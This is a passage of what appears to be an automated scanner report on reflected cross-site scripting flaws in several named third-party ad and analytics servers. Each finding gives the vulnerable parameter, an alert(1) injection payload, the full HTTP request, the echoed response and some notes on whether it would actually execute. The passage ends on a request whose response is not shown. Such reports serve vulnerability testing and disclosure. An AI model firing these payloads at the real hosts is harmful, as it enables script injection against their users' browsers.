GET /ads?rt=2&et=1948da--><script>alert(1)</script>b81f0b3d616&bi=46019&se=m&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1 Host: ads.newtention.net Proxy-Connection: keep-alive Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:54:23 GMT Content-Type: text/html Content-Length: 294 P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT" Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head></head> <body style="margin:0; padding:0;"> <!-- Not supported event type (1948da--><script>alert(1)</script>b81f0b3d616)! AdServer: app09 --> ...[SNIP]...
The value of the rt request parameter is copied into an HTML comment. The payload 25d7e--><script>alert(1)</script>022e12d8c56 was submitted in the rt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads?rt=225d7e--><script>alert(1)</script>022e12d8c56&et=1&bi=46019&se=m&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1 Host: ads.newtention.net Proxy-Connection: keep-alive Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:54:23 GMT Content-Type: text/html Content-Length: 296 P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT" Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head></head> <body style="margin:0; padding:0;"> <!-- Not supported request type (225d7e--><script>alert(1)</script>022e12d8c56)! AdServer: app09 --> ...[SNIP]...
The value of the se request parameter is copied into an HTML comment. The payload 1f60d--><script>alert(1)</script>0d94a310df2 was submitted in the se parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads?rt=2&et=1&bi=46019&se=m1f60d--><script>alert(1)</script>0d94a310df2&cs=1537&ts=convjli,bgymscohlozK&cr=http://adclient.uimserv.net/event.ng/Type%3Dclick%26FlightID%3D335339%26AdID%3D672937%26TargetID%3D109341%26Redirect%3D[[reredirect_plain]] HTTP/1.1 Host: ads.newtention.net Proxy-Connection: keep-alive Referer: http://adimg.uimserv.net/TAM/adsafe.html?s=//ads.newtention.net/ads%3Frt%3D2%26et%3D1%26bi%3D46019%26se%3Dm%26cs%3D1537%26ts%3Dconvjli,bgymscohlozK%26cr%3Dhttp%3A//adclient.uimserv.net/event.ng/Type%253Dclick%2526FlightID%253D335339%2526AdID%253D672937%2526TargetID%253D109341%2526Redirect%253D%5B%5Breredirect_plain%5D%5D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 18:54:24 GMT Content-Type: text/html Content-Length: 307 P3P: policyref="http://ads.newtention.net/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa OUR IND COM NAV INT" Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head></head> <body style="margin:0; padding:0;"> <!-- Server parameter value is not supported: m1f60d--><script>alert(1)</script>0d94a310df2 AdServer: app04 --> ...[SNIP]...
The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload a2ace<script>alert(1)</script>2df88929d80 was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ag.asp?cc=a2ace<script>alert(1)</script>2df88929d80&source=js&ord=1247160529 HTTP/1.1 Host: adsfac.us Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/abmOQK1UJ90aynSr3HUrB0WtFUmb7rRUvrYqQt3TZbh4qrYmEMAYbjbUHfVoPfJmGnooWvJ3EMf3tes3A7ZdmFUZcYcrTYGZbV0cfNpTF42bQRTFfZcWAYWQTb2SsQMQdZbxYt7qVP3u2GB3XbBIU6qr5mUeRmfF3tBMXHJJmdAo3938fIhilL/2448066/adTag.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 293 Content-Type: text/html Expires: Sun, 20 Mar 2011 17:25:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSa2ace%3Cscript%3Ealert%281%29%3C%2Fscript%3E2df88929d800=uid=9248110; expires=Mon, 21-Mar-2011 17:26:08 GMT; path=/ Set-Cookie: FSa2ace%3Cscript%3Ealert%281%29%3C%2Fscript%3E2df88929d80=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4096&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Wed, 20-Apr-2011 17:26:08 GMT; path=/ P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sun, 20 Mar 2011 17:26:07 GMT Connection: close
The value of the partner_key request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ba'%3balert(1)//5a0c330758a was submitted in the partner_key parameter. This input was echoed as 457ba';alert(1)//5a0c330758a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /button.js?partner_key=04e77fc8cc74396e5f52b887dd10171a457ba'%3balert(1)//5a0c330758a&token=quova13006323844d861340674da HTTP/1.1 Host: assets.truvie.com Proxy-Connection: keep-alive Referer: http://www.quova.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 14:50:48 GMT Server: Apache/2.2.16 (Fedora) Connection: close Content-Type: text/javascript Content-Length: 7278
/*global document, window, escape */ var agt = window.navigator.userAgent.toLowerCase(); var opera = agt.indexOf('opera') !== -1; var ie = agt.indexOf('msie') !== -1; var ns = window.navigator.app ...[SNIP]... <param name="movie" value="http://04e77fc8cc74396e5f52b887dd10171a457ba';alert(1)//5a0c330758a-quova13006323844d861340674da.assets.truvie.com/movie.swf?q=partner_key%3D04e77fc8cc74396e5f52b887dd10171a457ba%2527%253Balert%25281%2529%252F%252F5a0c330758a%26token%3Dquova13006323844d861340674da&por ...[SNIP]...
The value of the token request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dbd'%3balert(1)//5b2336207c5 was submitted in the token parameter. This input was echoed as 13dbd';alert(1)//5b2336207c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /button.js?partner_key=04e77fc8cc74396e5f52b887dd10171a&token=quova13006323844d861340674da13dbd'%3balert(1)//5b2336207c5 HTTP/1.1 Host: assets.truvie.com Proxy-Connection: keep-alive Referer: http://www.quova.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 14:50:49 GMT Server: Apache/2.2.16 (Fedora) Connection: close Content-Type: text/javascript Content-Length: 7246
/*global document, window, escape */ var agt = window.navigator.userAgent.toLowerCase(); var opera = agt.indexOf('opera') !== -1; var ie = agt.indexOf('msie') !== -1; var ns = window.navigator.app ...[SNIP]... <param name="movie" value="http://04e77fc8cc74396e5f52b887dd10171a-quova13006323844d861340674da13dbd';alert(1)//5b2336207c5.assets.truvie.com/movie.swf?q=partner_key%3D04e77fc8cc74396e5f52b887dd10171a%26token%3Dquova13006323844d861340674da13dbd%2527%253Balert%25281%2529%252F%252F5b2336207c5&port=443&host=04e77fc8cc74396e5f ...[SNIP]...
The value of the c1 request parameter is copied into the body of the beacon.js response, which is served as application/x-javascript rather than HTML. The payload a04ba<script>alert(1)</script>d250a5589a3 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response, but a <script> tag echoed into a script resource is not executed as markup. Before treating this as exploitable, confirm where in the script the value lands (for example inside a quoted string, where a quote break-out is the meaningful test) and whether a browser that sniffs content types could render the response as HTML; the response headers below do not send X-Content-Type-Options: nosniff.
Request
GET /beacon.js?c1=3a04ba<script>alert(1)</script>d250a5589a3&c2=6035155&c3=5119479&c4=41005094&c5=57956784&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c2 request parameter is copied into the body of the beacon.js response, which is served as application/x-javascript rather than HTML. The payload 3a577<script>alert(1)</script>f0467ef660e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response; an echoed <script> tag is inert in a script resource, so confirm the JavaScript context the value lands in before treating this as exploitable.
Request
GET /beacon.js?c1=3&c2=60351553a577<script>alert(1)</script>f0467ef660e&c3=5119479&c4=41005094&c5=57956784&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c3 request parameter is copied into the body of the beacon.js response, which is served as application/x-javascript rather than HTML. The payload b855a<script>alert(1)</script>1d3b5ae5845 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response; an echoed <script> tag is inert in a script resource, so confirm the JavaScript context the value lands in before treating this as exploitable.
Request
GET /beacon.js?c1=3&c2=6035155&c3=5119479b855a<script>alert(1)</script>1d3b5ae5845&c4=41005094&c5=57956784&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c4 request parameter is copied into the body of the beacon.js response, which is served as application/x-javascript rather than HTML. The payload ae805<script>alert(1)</script>db104d8ffcd was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response; an echoed <script> tag is inert in a script resource, so confirm the JavaScript context the value lands in before treating this as exploitable.
Request
GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094ae805<script>alert(1)</script>db104d8ffcd&c5=57956784&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c5 request parameter is copied into the body of the beacon.js response, which is served as application/x-javascript rather than HTML. The payload 40c75<script>alert(1)</script>d0c790edaba was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response; an echoed <script> tag is inert in a script resource, so confirm the JavaScript context the value lands in before treating this as exploitable.
Request
GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094&c5=5795678440c75<script>alert(1)</script>d0c790edaba&c6=& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the c6 request parameter is copied into the body of the beacon.js response, which is served as application/x-javascript rather than HTML. The payload 241f7<script>alert(1)</script>0ecb1669f4b was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response; an echoed <script> tag is inert in a script resource, so confirm the JavaScript context the value lands in before treating this as exploitable.
Request
GET /beacon.js?c1=3&c2=6035155&c3=5119479&c4=41005094&c5=57956784&c6=241f7<script>alert(1)</script>0ecb1669f4b& HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N4568.TribalFusionAdNetwork/B5119479.5;sz=300x250;click=http://a.tribalfusion.com/h.click/a2mOvJmdIyUdJ6XF3dYrYg1a6NRbBDWUZbXVH32orJqPF7rYTFq5Eje4ar2oEMA1FF6TtjXmAbJnc3omHnA2qMh2HAy5PFGpbYEYsfSXcMV0VvvmErP5Un4VrnEWPYTPTU0PsQsStFNYHbsVmYN2cBWXrnZcVAau2AYaPPMKPaQE7iMjZdB/;ord=1247147914? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=6d0f24-24.143.206.42-1297806131
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 27 Mar 2011 17:26:42 GMT Date: Sun, 20 Mar 2011 17:26:42 GMT Connection: close Content-Length: 3603
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 214c7'%3balert(1)//3be38b6ab7b was submitted in the $ parameter. This input was echoed as 214c7';alert(1)//3be38b6ab7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. In the body below the value lands in two literals, the single-quoted zzPat and the double-quoted zzStr; the payload's quote closes zzPat, alert(1) becomes a statement of its own, and the // comment hides the rest of the line, so the script parses and runs. The same value is also written unencoded into the FFpb cookie in the Set-Cookie header, where the payload's semicolon truncates the cookie value. Since fm.js is served as application/x-javascript, the injected code runs in the origin of whichever page includes the script with this query string.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=214c7'%3balert(1)//3be38b6ab7b&s=1&z=0.18005222734063864 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1219:214c7';alert(1)//3be38b6ab7b;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=84 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:41 GMT Connection: close Content-Length: 895
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',214c7';alert(1)//3be38b6ab7b';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=,214c7';alert(1)//3be38b6ab7b;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6583d"%3balert(1)//b046b0d6fdc was submitted in the $ parameter. This input was echoed as 6583d";alert(1)//b046b0d6fdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response, but check it by hand before rating it. The double quote cannot close the single-quoted zzPat literal, so the break-out happens in the double-quoted zzStr literal inside the if block, and the // comment then runs to the end of the line. On the single-line body shown below that comment swallows the block's closing brace, so a browser would raise a syntax error and execute nothing; the finding is only exploitable if the server's real line layout differs from what is printed here.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=6583d"%3balert(1)//b046b0d6fdc&s=1&z=0.18005222734063864 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1219:6583d";alert(1)//b046b0d6fdc;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "823f84fd-80e3-49ea762bb1f00" Vary: Accept-Encoding X-Varnish: 1854305258 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=85 Expires: Sun, 20 Mar 2011 17:16:05 GMT Date: Sun, 20 Mar 2011 17:14:40 GMT Connection: close Content-Length: 895
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',6583d";alert(1)//b046b0d6fdc';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=,6583d";alert(1)//b046b0d6fdc;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5abb7"%3balert(1)//4ceb5a9102f was submitted in the q parameter. This input was echoed as 5abb7";alert(1)//4ceb5a9102f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response, with the same reservation as every double-quote payload on fm.js: the break-out happens inside the double-quoted zzStr literal within the if block, and on the single-line body shown below the // comment swallows that block's closing brace, so a browser would raise a syntax error rather than run alert(1). Verify the raw line layout before rating this exploitable.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=5abb7"%3balert(1)//4ceb5a9102f&$=&s=1&z=0.18005222734063864 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380
Response (redirected)
